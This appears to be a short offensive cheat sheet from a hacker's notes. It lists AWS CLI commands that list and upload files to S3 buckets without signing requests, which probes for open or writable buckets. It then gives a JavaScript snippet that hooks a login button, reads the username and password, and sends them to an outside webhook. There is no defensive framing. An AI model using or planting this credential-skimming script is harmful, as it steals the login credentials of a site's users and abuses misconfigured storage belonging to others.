Hack. Eat. Sleep. Repeat!!!
--no-sign-request-:aws s3 ls s3://[url]/ --no-sign-request
PutObject is enabled-:aws s3 cp <flename> s3://[url]/ --no-sign-request
document.addEventListener("DOMContentLoaded", function () {
document.getElementById("login-btn").addEventListener("click", function () {
const username = document.getElementById("username").value;
const password = document.getElementById("password").value;
var creds = `${username}%20${password}`;
fetch("[webhook]?password="+creds);
});
});